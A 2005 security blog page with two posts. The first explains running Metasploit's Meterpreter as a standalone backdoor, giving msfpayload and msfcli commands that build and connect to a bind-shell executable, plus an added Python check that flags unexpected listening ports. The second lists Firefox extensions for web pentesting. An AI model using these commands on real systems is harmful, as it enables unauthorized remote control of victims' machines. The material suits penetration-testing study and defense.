Wednesday, October 26, 2005

Using Meterpreter as a standalone utility

Post-exploitation techniques are a cool topic. These days I read a thread on the Metasploit mailing list about using the Meterpreter payload as a standalone utility; for example, after exploiting SQL injection you can upload Meterpreter and work through it. Here is a quick example of how to achieve this.

To create the meterpreter server:

$ msfpayload win32_bind_meterpreter LPORT=4321 X > met.exe

Copy this executable to the target system and find some way to execute it.

After executing it, you can use the "payload_handler" exploit to connect and interact with it:

$ msfcli payload_handler PAYLOAD=win32_bind_meterpreter LPORT=4321 RHOST= E

I haven't time to test it but I think it works.

This is great for Windows. If the target system is Unix, you could rely on S.E.L.F. (Shellcode ELF Loader), another approach to the same "post-exploitation" objective; I recommend taking a look at the S.E.L.F. Phrack article.
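
From the defender's side, a bind payload like the one above shows up on the target as a new TCP listener on the chosen LPORT. The following is an added example, not part of the original post: it compares `netstat -ano` and `tasklist /fo csv /nh` output against a baseline of expected listeners. The sample output, the baseline and the function names are constructed for illustration.

```python
import csv
import io

# Constructed sample of `netstat -ano` output (not captured from a real host).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:4321           0.0.0.0:0              LISTENING       3388
  TCP    10.0.0.5:1433          0.0.0.0:0              LISTENING       1520
  TCP    10.0.0.5:1433          10.0.0.9:50122         ESTABLISHED     1520
  TCP    [::]:445               [::]:0                 LISTENING       4
  UDP    0.0.0.0:500            *:*                                    700
"""
# Constructed sample of `tasklist /fo csv /nh` output.
SAMPLE_TASKLIST = '''\
"System","4","Services","0","236 K"
"svchost.exe","912","Services","0","8,112 K"
"sqlservr.exe","1520","Services","0","412,004 K"
"met.exe","3388","Services","0","3,020 K"
'''
# Hypothetical baseline of expected (image name, port) listeners for this host.
BASELINE = {("system", 445), ("svchost.exe", 135), ("sqlservr.exe", 1433)}

def parse_listeners(netstat_text):
    """Return a set of (local_address, port, pid) for TCP sockets in LISTENING state."""
    listeners = set()
    for line in netstat_text.splitlines():
        fields = line.split()
        # Header, UDP and blank lines do not have exactly five fields.
        if len(fields) == 5 and fields[0] == "TCP" and fields[3] == "LISTENING":
            addr, _, port = fields[1].rpartition(":")  # copes with IPv6 "[::]:445"
            listeners.add((addr, int(port), int(fields[4])))
    return listeners

def parse_tasklist(tasklist_csv):
    """Map PID -> lowercase image name from `tasklist /fo csv /nh` output."""
    rows = csv.reader(io.StringIO(tasklist_csv))
    return {int(row[1]): row[0].lower() for row in rows if len(row) >= 2}

def unexpected_listeners(netstat_text, tasklist_csv, baseline):
    """Return sorted (image, address, port, pid) for listeners missing from the baseline."""
    images = parse_tasklist(tasklist_csv)
    found = [(images.get(pid, "<unknown>"), addr, port, pid)
             for addr, port, pid in parse_listeners(netstat_text)]
    return sorted(f for f in found if (f[0], f[2]) not in baseline)

if __name__ == "__main__":
    for image, addr, port, pid in unexpected_listeners(SAMPLE_NETSTAT, SAMPLE_TASKLIST, BASELINE):
        print(f"unexpected listener: {image} (pid {pid}) on {addr}:{port}")
```

A listener whose PID has no matching process entry is reported as `<unknown>` rather than skipped, since a missing image name is itself worth investigating.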

Sunday, October 2, 2005

Mozilla Firefox extensions for the pentester

Here I will list some of the most useful extensions for doing application audits or pentests using Mozilla Firefox:


* Lets you edit request headers and replay a URL. Look for the Replay button in the live window! Very useful ;)

Web Developer Tools:
* An excellent tool that lets you do a lot of things; a must-have. It turns the browser into a complete development tool.

Switch Proxy Tools:
* This extension allows you to define a list of proxies and switch between them on the fly with a button, very fast! Tor, Paros, Burp, WebScarab, JAP.

Tamper Data:
* Use Tamper Data to view and modify HTTP/HTTPS headers and POST parameters. Trace and time HTTP responses/requests.

* A front end for HTTrack; you can create website mirrors from the browser.

* Slogger creates a complete log of your browsing history. It can save every page using the same options as the "Save Page As" command, as well as saving a customizable plain-text history file.

Add n Edit Cookies:
* Cookie editor that allows you to add and edit "session" and saved cookies.

If you have another interesting plugin, please share ;)